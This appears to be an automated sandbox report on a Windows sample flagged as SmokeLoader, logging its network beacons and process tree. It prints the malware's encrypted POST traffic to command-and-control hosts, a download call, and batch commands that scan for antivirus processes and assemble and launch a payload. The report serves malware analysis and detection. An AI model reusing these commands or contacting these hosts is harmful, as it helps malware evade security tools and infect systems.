                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        9192.168.2.449753186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:37.305665970 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://kxgtxppvhlmsi.net/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 311
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:37.305697918 CEST311OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2d 42 a8 90
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vu-BNElU3-vjK!_,o""/P|x{+3l&rL%zeAN,kclpLjTpD%q[`
                                                                                                                                                                                        May 2, 2024 20:49:38.000391006 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:37 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        10192.168.2.449754186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:38.222923994 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://dgqkmisxnbbni.net/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 138
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:38.222948074 CEST138OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 65 20 e4 94
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vue s_W~5iv%5:4H\f{F-
                                                                                                                                                                                        May 2, 2024 20:49:38.914377928 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:38 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        11192.168.2.449755186.10.34.243802580C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        May 2, 2024 20:49:39.138360977 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://uwgftqaxwugurgs.com/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 165
                                                                                                                                                                                        Host: cellc.org
                                                                                                                                                                                        May 2, 2024 20:49:39.138421059 CEST165OUTData Raw: 3b 6e 24 17 f5 be 6b 52 ac dc c8 70 75 72 0b b8 09 0a cc ec 1e 74 91 66 7c 79 7b 96 45 b6 c1 6b e9 2d ce 2e 76 65 2b 1a e6 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 43 33 c8 89
                                                                                                                                                                                        Data Ascii: ;n$kRpurtf|y{Ek-.ve+? 9Yt M@NA -[k,vuC3^}kXI,!z[c'g\~?7`GKCON,[Su(
                                                                                                                                                                                        May 2, 2024 20:49:39.830506086 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Server: nginx/1.26.0
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:49:39 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.449734104.21.79.2294437736C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-05-02 18:47:57 UTC56OUTGET /16G965 HTTP/1.1
                                                                                                                                                                                        User-Agent: Walk
                                                                                                                                                                                        Host: 2no.co
                                                                                                                                                                                        2024-05-02 18:47:58 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Thu, 02 May 2024 18:47:58 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        set-cookie: 538003043210778337=3; expires=Fri, 02 May 2025 18:47:58 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                        set-cookie: clhf03028ja=191.96.150.225; expires=Fri, 02 May 2025 18:47:58 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                        memory: 0.42153167724609375
                                                                                                                                                                                        expires: Thu, 02 May 2024 18:47:58 +0000
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        strict-transport-security: max-age=604800
                                                                                                                                                                                        strict-transport-security: max-age=31536000
                                                                                                                                                                                        content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2YHDGK7gsvZq27KHxsPtvg3IlfF4SKUZxN92ngAtiiPXaNHgLoinLSyt7rs4E82gXEwbFZLaKkIHygOg9YpHzNTwtEkG4qPbiHopl29BgddB3i1IlCAxTQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 87da2ecbdd0a0cc2-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        2024-05-02 18:47:58 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                        Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                        2024-05-02 18:47:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:20:47:47
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:751'720 bytes
                                                                                                                                                                                        MD5 hash:0C4CB8FD1E3CC4B42556562D317E6E59
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                        Start time:20:47:51
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit
                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                        Start time:20:47:51
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                        Start time:20:47:52
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                        Imagebase:0x990000
                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                        Start time:20:47:52
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                                                                                                                        Imagebase:0xe90000
                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:20:47:53
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                        Imagebase:0x990000
                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:20:47:53
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                                                        Imagebase:0xe90000
                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:20:47:53
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:cmd /c md 1151
                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                        Start time:20:47:53
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:findstr /V "decentrisingadvertisementssuite" Appliance
                                                                                                                                                                                        Imagebase:0x800000
                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:20:47:55
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:cmd /c copy /b Annually + Protective 1151\b
                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                        Start time:20:47:55
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:1151\Existence.pif 1151\b
                                                                                                                                                                                        Imagebase:0x730000
                                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                        Start time:20:47:55
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:ping -n 5 127.0.0.1
                                                                                                                                                                                        Imagebase:0x630000
                                                                                                                                                                                        File size:18'944 bytes
                                                                                                                                                                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                        Start time:20:48:44
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
                                                                                                                                                                                        Imagebase:0x730000
                                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                        Start time:20:48:54
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                        Imagebase:0x7ff72b770000
                                                                                                                                                                                        File size:5'141'208 bytes
                                                                                                                                                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                        Start time:20:49:19
                                                                                                                                                                                        Start date:02/05/2024
                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\ssjhrji
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\ssjhrji
                                                                                                                                                                                        Imagebase:0xad0000
                                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:18.8%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:17.1%
                                                                                                                                                                                          Total number of Nodes:1365
                                                                                                                                                                                          Total number of Limit Nodes:20
